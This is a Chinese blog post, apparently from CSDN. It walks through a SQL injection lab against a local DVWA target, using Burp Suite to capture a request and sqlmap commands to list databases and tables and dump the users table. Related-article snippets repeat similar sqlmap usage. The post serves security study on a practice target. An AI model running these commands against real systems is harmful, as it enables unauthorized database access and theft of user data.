利用sql注入漏洞,获得数据库的数据信息(实验仅供参考,要遵守网络安全法)

最新推荐文章于 2024-05-22 10:15:00 发布
最新推荐文章于 2024-05-22 10:15:00 发布
阅读量2.8k 收藏 11
点赞数 3
分类专栏: 安全 文章标签: 数据库 sql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50904074/article/details/120532028
版权

1.开启预先准备好的xampp靶机

 

2.在主机上打开火狐,在输入框输入http://172.16.12.13:81(172.16.12.13是靶机地址)

81代表的是dvwa的端口号

 

3.输入用户名:admin密码:password登录

 

4.把安全等级改为low级,点击提交

5.打开burp suite软件,设置拦截请求

(拦截http请求是建立在网络代理相同的情况下,可以手动配置)

 

6.打开火狐,点击sql注入,在输入框中输入1,点击提交

7.打开bs显示被拦截

 

8.全部选中,点击鼠标右键,选择复制到文件

 

9.创建一个名叫wn.txt的文件

10.打开sqlmap,输入python sqlmap.py -r “d:\wn.txt”--dbs

-r:读取系统文件

--dbs:枚举数据库名称

 

11.查到数据库dvwa,输入python sqlmap.py -r “d:\wn.txt” -D dvwa --tables

-D:指定数据库

--tables:查找数据库的中表

 

12.查询到users表,输入python sqlmap.py -r “d:\wn.txt” -D dvwa -T users

--dump

-T:指定数据库中的表

--dump:列举数据库的表中部分数据

 

 

13.至此sqlmap注入成功,成功得到数据库users表中的信息!

 

北极狐fox
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入教程——(三)简单的注入尝试
hijack89的博客
07-26 1万+
本文将以简单的SQL注入实例来讲解SQL注入的基本思路与流程,当然本文实例只是注入的一种情况,初学者应重理解思路,学会举一反三。GET与POST进行SQL注入攻击,大家还需要了解两种基本的 HTTP 请求方:GET 和 POST。在客户机和服务器之间进行请求-响应时,两种最常被用到的方是:GET 和 POST。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据
SQL注入漏洞靶场-sqli-labs学习
weixin_46595570的博客
01-03 2844
less-1 判断注入 根据提示在url中添加?id=1 ——注意此处输入的都是英文符号 当然2也可以,这里只是为了传递一个参数,从而输出一个登陆结果 我们知道了登陆成功的页面之后,现在就要尝试他对于一段代码的闭合方式的猜测(这里有“‘单引号”,“”双引号”,“)括号”,以及他们的组合方式) 现在我们尝试一下单引号,出现报错,说明可能与他有关 对于网址里面的%27,%20其实就是url的编码结果,就像是’对应%27,空格对应%20 然后...
利用SQLi 进行数据库注入爆破爆库获取信息
weixin_42565036的博客
06-22 3331
SQLi数据库注入分析工具的使用目录什么是SQL注入?第一步,通过Dorks寻找网站的可爆破找到可爆破的网站进一步筛选可爆破的网站进行数据库的读取选择其中一个数据库,读取里面的表类目成功爆破到用户信息创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 目录 本文仅供学习使用,请勿非使用计算机系统进行网路攻击,这是不被律所允许的!本文使用数据库S
SQL注入sqlmap入门教程_sqlmap注入
m0_61869253的博客
05-22 697
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
SQL注入获取数据库用户表数据
qq_59099375的博客
03-18 1287
SQL注入获取数据库数据
mysql sql注入怎么获取数据_手把手教你通过SQL注入盗取数据库信息
weixin_39940344的博客
02-17 1251
目录数据库结构注入示例判断共有多少字段判断字段的显示位置显示登录用户和数据库获取所有数据库获取对应数据库的表获取对应表的字段获取所有的用户密码我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非的事,只是知道小偷怎么偷东西才能更好地防范。SQL注入(SQL Injection),指将非SQL命令插入到URL或者Web表单中请求,而这些请求被服务器认为是正常的SQL语句进行执行。...
sql注入获取数据库
qq_35490522的博客
07-25 810
sql注入和可能存在目录遍历和xss和csrf 获取web服务操作系统、web应用服务器、DBMS、当前数据信息 sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user 显示数据库中的表,执行命令样式: sqlmap.py -u "http://域名/about.asp?id=325" --tables 选择admin表,显示表的结构,执行命令:./sqlmap.py -u "http://域名/about.asp?id=325"
WEB安全-SQL注入基于sqliabs靶场分析原理
weixin_45152278的博客
10-09 1351
基于sqlibas靶场分析SQL注入原理
SQL手工注入漏洞测试(MySQL数据库)
天天学安全专属博客
10-27 800
SQL手工注入漏洞测试(MySQL数据库),手工注入sql语句,最详细的sql注入流程
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
SQL注入漏洞网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
网络安全初探SQL注入漏洞
07-02
网络安全领域,SQL注入漏洞是一种常见的安全威胁,尤其在基于Web的应用程序中。本文将深入探讨SQL注入漏洞的原理、危害、以及如何防范这一问题。 SQL(Structured Query Language)是用于管理和处理关系数据库的...
利用SQL注入漏洞登录后台的实现方
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方。 1. **SQL注入的基本原理**: SQL注入的...
利用SQL注入漏洞拖库的方
09-11
SQL注入漏洞是一种常见的网络安全问题,主要出现在Web应用程序中,允许攻击者通过输入恶意的SQL语句来操纵数据库。本文将深入探讨如何利用SQL注入漏洞进行拖库操作,即获取数据库中的全部或部分数据。 首先,理解...
南方数据企业网站管理系统源码包-存有sql注入漏洞数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(六)-SQL注入数字型
m0_47470899的博客
03-12 4702
目录前言:一、SQL 注入漏洞简介1、简介2、危害3、利用4、防范二、相关配置三、编写“SQL 注入漏洞-数字型注入”后端代码1、使用 springboot 框架创建项目2、编写 indexController3、编写 sqli - 数字型 select三、编写“SQL 注入漏洞-数字型注入”前端代码四、运行测试参考文章: 前言: 在项目实训的前面的几天时间里,我的主要工作是学习了 docker 的安装与使用,学会使用命令行控制 docker 容器的创建、删除等。然后学习了 springboot 框架的基
网络安全】浅识 SQL 注入
阿道夫的博客
12-23 161
什么是 SQL 注入?通过把 SQL 命令插入到 Web 表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的 SQL 命令。1.对于 Web 应用程序而言,用户核心数据存储在数据库中,如 MySQLSQL Server,Oracle;2.通过 SQL 注入攻击,可以获取,修改,删除数据库信息,并且通过提权来控制 Web 服务器等;
(12)web安全|渗透测试|网络安全 信息收集,注入获取数据图解,附带靶场搭建教程及可能遇见的问题
02-20 1755
简单的注入方图解,以及详细图解靶场应用,总结搭建环境遇见的问题
SQL注入
weixin_48712514的博客
05-17 289
** sql注入 ** SQL注入SQL lnjection)是一种常见的WEB安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击。 ** SQL注入原理 通过用户可控参数中注入SQL,破坏原有SQL结构,达到攻击的行为。 1:处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句 2:未对用户的输入的参数进行足够的过滤,便将参数的内容拼接到SQL语句中 ** 漏洞的危害 1:利用sql出任漏洞,可以获取数据库的多种信息,(列如:管理员后台账密),从而脱取数据库中的
SQL注入靶场实战-MySQL
qq_40467699的博客
04-17 9299
注:本次测试使用纯手工注入,无任何自动化软件辅助。 此靶场是运用了数据值的base64位编码,在转换编码的时候比较困难,手工回显注入无任何差别(无过滤字符)。 这里推荐火狐浏览器的HackBar插件,插件自带编码转换功能比较方便。 靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozh...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北极狐fox

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值